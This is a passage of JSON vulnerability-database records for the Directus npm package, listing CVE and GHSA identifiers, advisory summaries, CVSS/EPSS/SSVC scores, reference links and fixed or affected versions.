lements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/31918?format=json","purl":"pkg:npm/directus@10.11.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.2"}],"aliases":["CVE-2024-36128","GHSA-632p-p495-25m5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qeh1-cm33-93g1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90513?format=json","vulnerability_id":"VCID-qfnx-egwg-ybgp","summary":"Directus is a real-time API and App dashboard for managing SQL database content. A vulnerability in versions prior to 11.13.0 allows authenticated users to search concealed/sensitive fields when they have read permissions. While actual values remain masked (`****`), successful matches can be detected through returned records, enabling enumeration attacks on sensitive data. Version 11.13.0 fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64748","reference_id":"","reference_type":"","scores":[{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15936","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.158","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64748"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/7737d56e096f95edfbdf861a3c08999ad31ce204","reference_id":"7737d56e096f95edfbdf861a3c08999ad31ce204","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:39:19Z/"}],"url":"https://github.com/directus/directus/commit/7737d56e096f95edfbdf861a3c08999ad31ce204"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64748","reference_id":"CVE-2025-64748","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64748"},{"reference_url":"https://github.com/advisories/GHSA-8jpw-gpr4-8cmh","reference_id":"GHSA-8jpw-gpr4-8cmh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8jpw-gpr4-8cmh"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-8jpw-gpr4-8cmh","reference_id":"GHSA-8jpw-gpr4-8cmh","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:39:19Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-8jpw-gpr4-8cmh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/35193?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64748","GHSA-8jpw-gpr4-8cmh"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qfnx-egwg-ybgp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/37995?format=json","vulnerability_id":"VCID-qrf3-cz1h-8kau","summary":"Directus is a real-time API and App dashboard for managing SQL database content. When relying on blocking access to localhost using the default `0.0.0.0` filter a user may bypass this block by using other registered loopback devices (like `127.0.0.2` - `127.127.127.127`). This issue has been addressed in release versions 10.13.3 and 11.1.0. Users are advised to upgrade. Users unable to upgrade may block this bypass by manually adding the `127.0.0.0/8` CIDR range which will block access to any `127.X.X.X` ip instead of just `127.0.0.1`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46990","reference_id":"","reference_type":"","scores":[{"value":"0.00237","scoring_system":"epss","scoring_elements":"0.47051","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00237","scoring_system":"epss","scoring_elements":"0.47191","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46990"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b","reference_id":"4aace0bbe57232e38cd6a287ee475293e46dc91b","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b"},{"reference_url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52","reference_id":"769fa22797bff5a9231599883b391e013f122e52","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52"},{"reference_url":"https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff","reference_id":"8cbf943b65fd4a763d09a5fdbba8996b1e7797ff","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff"},{"reference_url":"https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431","reference_id":"c1f3ccc681595038d094ce110ddeee38cb38f431","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46990","reference_id":"CVE-2024-46990","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46990"},{"reference_url":"https://github.com/advisories/GHSA-68g8-c275-xf2m","reference_id":"GHSA-68g8-c275-xf2m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-68g8-c275-xf2m"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m","reference_id":"GHSA-68g8-c275-xf2m","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33327?format=json","purl":"pkg:npm/directus@10.13.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3"},{"url":"http://public2.vulnerablecode.io/api/packages/33328?format=json","purl":"pkg:npm/directus@11.0.0-rc.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.0.0-rc.1"},{"url":"http://public2.vulnerablecode.io/api/packages/33329?format=json","purl":"pkg:npm/directus@11.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-3vnr-k31f-vycv"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-ghbw-eqaz-jqhs"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0"}],"aliases":["CVE-2024-46990","GHSA-68g8-c275-xf2m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qrf3-cz1h-8kau"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/70838?format=json","vulnerability_id":"VCID-rdpb-7dcd-fyby","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Before 11.14.1, a timing-based user enumeration vulnerability exists in the password reset functionality. When an invalid reset_url parameter is provided, the response time differs by approximately 500ms between existing and non-existing users, enabling reliable user enumeration. This vulnerability is fixed in 11.14.1.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26185","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02551","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02548","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26185"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/pull/26485","reference_id":"26485","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/"}],"url":"https://github.com/directus/directus/pull/26485"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26185","reference_id":"CVE-2026-26185","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26185"},{"reference_url":"https://github.com/directus/directus/commit/e69aa7a5248c6e3e822cb1ac354dee295df90b2a","reference_id":"e69aa7a5248c6e3e822cb1ac354dee295df90b2a","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/"}],"url":"https://github.com/directus/directus/commit/e69aa7a5248c6e3e822cb1ac354dee295df90b2a"},{"reference_url":"https://github.com/advisories/GHSA-jr94-gj3h-c8rf","reference_id":"GHSA-jr94-gj3h-c8rf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jr94-gj3h-c8rf"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf","reference_id":"GHSA-jr94-gj3h-c8rf","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.14.1","reference_id":"v11.14.1","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.14.1"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/39145?format=json","purl":"pkg:npm/directus@11.14.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.14.1"}],"aliases":["CVE-2026-26185","GHSA-jr94-gj3h-c8rf"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rdpb-7dcd-fyby"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/105820?format=json","vulnerability_id":"VCID-rren-vtar-23fm","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.0.0 and prior to version 11.9.0, the exact Directus version number is incorrectly being used as OpenAPI Spec version this means that it is being exposed by the `/server/specs/oas` endpoint without authentication. With the exact version information a malicious attacker can look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version. Version 11.9.0 fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53887","reference_id":"","reference_type":"","scores":[{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.55091","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.55212","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53887"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53887","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53887"},{"reference_url":"https://github.com/directus/directus/pull/25353","reference_id":"25353","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/pull/25353"},{"reference_url":"https://github.com/directus/directus/commit/e74f3e4e92edc33b5f83eefb001a3d2a85af17a3","reference_id":"e74f3e4e92edc33b5f83eefb001a3d2a85af17a3","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/commit/e74f3e4e92edc33b5f83eefb001a3d2a85af17a3"},{"reference_url":"https://github.com/advisories/GHSA-rmjh-cf9q-pv7q","reference_id":"GHSA-rmjh-cf9q-pv7q","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-rmjh-cf9q-pv7q"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-rmjh-cf9q-pv7q","reference_id":"GHSA-rmjh-cf9q-pv7q","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-rmjh-cf9q-pv7q"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.9.0","reference_id":"v11.9.0","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.9.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/378353?format=json","purl":"pkg:npm/directus@11.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0"}],"aliases":["